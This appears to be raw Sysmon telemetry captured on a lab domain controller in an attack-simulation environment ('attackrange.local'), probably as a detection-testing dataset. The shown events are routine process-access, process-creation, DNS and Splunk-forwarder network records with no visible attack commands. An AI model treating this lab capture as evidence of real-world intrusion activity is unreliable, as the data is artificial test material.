12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6485-6064-7300-00000000AE01}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6485-6064-7300-00000000AE01}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.144{266CAFBE-6485-6064-7300-00000000AE01}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.942{266CAFBE-647C-6064-2B00-00000000AE01}2536WIN-DC-8920fe80::8c4d:e56a:c9ce:fd2b;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.942{266CAFBE-647C-6064-2B00-00000000AE01}2536WIN-DC-892010.0.1.14;C:\Windows\System32\spoolsv.exe 
22542200x80000000000000002946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.702{266CAFBE-647C-6064-2B00-00000000AE01}2536WIN-DC-8920fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\spoolsv.exe 354300x80000000000000002945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.748{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49697-false10.0.1.12-9997- 354300x80000000000000002944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.871{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54254- 23542300x80000000000000002943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.112{266CAFBE-6484-6064-7200-00000000AE01}4296NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.408{266CAFBE-6486-6064-7400-00000000AE01}44604464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6486-6064-7400-00000000AE01}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6486-6064-7400-00000000AE01}4460C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6486-6064-7400-00000000AE01}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.021{266CAFBE-6486-6064-7400-00000000AE01}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.743{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.64-53860-false10.0.1.14win-dc-892.attackrange.local5986- 354300x80000000000000002962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.871{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54254- 354300x80000000000000002994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.887{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54223- 10341000x80000000000000002993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.127{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6486-6064-7500-00000000AE01}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 